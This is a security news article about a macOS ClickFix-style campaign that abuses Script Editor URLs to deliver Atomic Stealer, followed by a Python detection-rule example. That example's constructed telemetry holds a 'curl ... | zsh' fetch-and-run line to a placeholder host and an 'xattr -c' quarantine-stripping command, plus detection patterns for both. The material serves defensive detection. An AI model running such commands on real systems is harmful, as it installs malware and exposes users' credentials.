A new campaign targeting macOS users once again relies on a social engineering technique that abuses a trusted system application: Script Editor. Security researchers have observed attackers using legitimate-looking web pages, usually guides to freeing disk space or improving Mac performance, to make the browser open special links that launch Script Editor with code already inserted. The result: the user sees a window of an apparently harmless native app, but behind it commands run that download and launch malware without ever going through an explicit Terminal session.
Script Editor is a tool preinstalled in macOS for creating and running AppleScript and JXA, and so it enjoys the system's privileges and trust. That trust is precisely what attackers exploit: instead of asking the user to copy and paste lines into Terminal (the classic tactic known as ClickFix), the AppleScript URL scheme is now used to open Script Editor with a malicious script already loaded. Once the user accepts opening it, the code can run a "curl | zsh" chain that downloads and executes scripts directly in memory, decompresses packed payloads, writes temporary binaries, removes security attributes with xattr and launches the final executable.

In this particular campaign, Jamf researchers identified the final payload as a Mach-O binary known as Atomic Stealer (also referred to as AMOS), off-the-shelf malware that has repeatedly appeared in ClickFix-type campaigns over the past year. Atomic Stealer is designed to extract sensitive information from the system: data stored in the Keychain, desktop contents, cryptocurrency wallet browser extensions, autofill data, passwords, cookies, saved cards and other system information. Recent reports also indicate that operators have added backdoor components to maintain persistent access to compromised machines.
The subtlety of the current variant is that the user does not necessarily have to interact with Terminal for the attack to work: Script Editor, by its very nature, can serve as an execution vector when supplied with code from a URL. Some measures added by Apple in recent macOS versions aim to stop these deceptions by showing warnings when commands are about to be run from Terminal or related applications; although these protections help, they do not completely eliminate the risk if the victim grants permission or confirms opening a script because they trust the page's content.
If you come across an online system maintenance guide that invites you to "run a command" or open a script, treat it with suspicion. Malicious pages often mimic the look and language of legitimate help resources to lower your guard: Apple iconography, screenshots and apparently reasonable steps. The general recommendation is to rely only on official documentation for system problems; Apple's support page on Script Editor can help you understand the real purpose of that tool: support.apple.com - Script Editor. For user-to-user questions and solutions, the official Apple community also exists, although it should be remembered that forums are not risk-free: Apple Support Communities.

In corporate and managed environments, using endpoint management and protection solutions reduces the likelihood of infection and makes it easier to detect abnormal behaviour; for home users, keeping the system up to date and distrusting "quick tricks" to recover space or speed up the machine is the most effective defense. In addition, if you suspect your computer has been compromised, you should disconnect it from networks, review processes with Activity Monitor, and seek the help of professionals or security tools for forensic analysis and cleanup.
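As an added illustration of the abnormal-behaviour detection mentioned above, applied to the Script Editor to shell to "curl | zsh" to xattr to temporary-binary chain described earlier, here is a small rule set run over constructed process telemetry. It is example code written for this article, not Jamf's or Apple's; it assumes the endpoint agent reports pid, parent pid, image name and command line per process, and that the "security attributes" stripped with xattr are the quarantine attribute.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name as the endpoint agent reports it (assumed shape)
    cmdline: str

# Constructed sample telemetry (not a real capture), shaped like the chain in the
# article; the same curl under Terminal is included to show that lineage matters.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "launchd", "/sbin/launchd"),
    ProcEvent(200, 100, "Script Editor", "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ProcEvent(201, 200, "zsh", "/bin/zsh -c curl -fsSL https://example.invalid/fix.sh | zsh"),
    ProcEvent(202, 201, "xattr", "xattr -c /private/tmp/.update_helper"),
    ProcEvent(203, 201, ".update_helper", "/private/tmp/.update_helper"),
    ProcEvent(300, 100, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(301, 300, "zsh", "/bin/zsh -c curl -O https://example.invalid/report.csv"),
]

SHELLS = {"sh", "bash", "zsh"}
CURL_PIPE_SHELL = re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh)\b")
# Assumption: the attribute being removed is com.apple.quarantine (or all attrs via -c).
QUARANTINE_STRIP = re.compile(r"\bxattr\b.*(-c\b|-d\s+com\.apple\.quarantine\b)")
TEMP_EXEC = re.compile(r"^(/private)?/tmp/|^/var/folders/")

def ancestors(ev, by_pid):
    """Image names of every ancestor of ev, nearest first."""
    cur = by_pid.get(ev.ppid)
    while cur is not None:
        yield cur.image
        cur = by_pid.get(cur.ppid)

def detect(events):
    """Return (pid, reason) for each event matching a rule with Script Editor as an ancestor."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if "Script Editor" not in set(ancestors(ev, by_pid)):
            continue  # the same commands under Terminal are routine admin activity
        if ev.image in SHELLS and CURL_PIPE_SHELL.search(ev.cmdline):
            findings.append((ev.pid, "curl output piped into a shell"))
        elif QUARANTINE_STRIP.search(ev.cmdline):
            findings.append((ev.pid, "extended attributes stripped with xattr"))
        elif TEMP_EXEC.match(ev.cmdline):
            findings.append((ev.pid, "executable launched from a temp directory"))
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags pids 201, 202 and 203 and ignores the Terminal-originated curl, which is the point of keying the rules on process lineage rather than on the commands alone.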
The reuse of legitimate applications by attackers is nothing new, but it is a reminder that the attack surface changes with the creativity of cybercriminals. Treating Script Editor prompts as potentially dangerous and verifying the origin of any technical instruction is, for now, the most practical way to avoid falling into these traps.
For more on how Apple and the security community are responding to these ClickFix variants and infostealer campaigns, recent research and news reports can be consulted; coverage summarizing Apple's introduction of warnings can be read at BleepingComputer, and the technical analysis of the Atomic Stealer campaign was published by Jamf.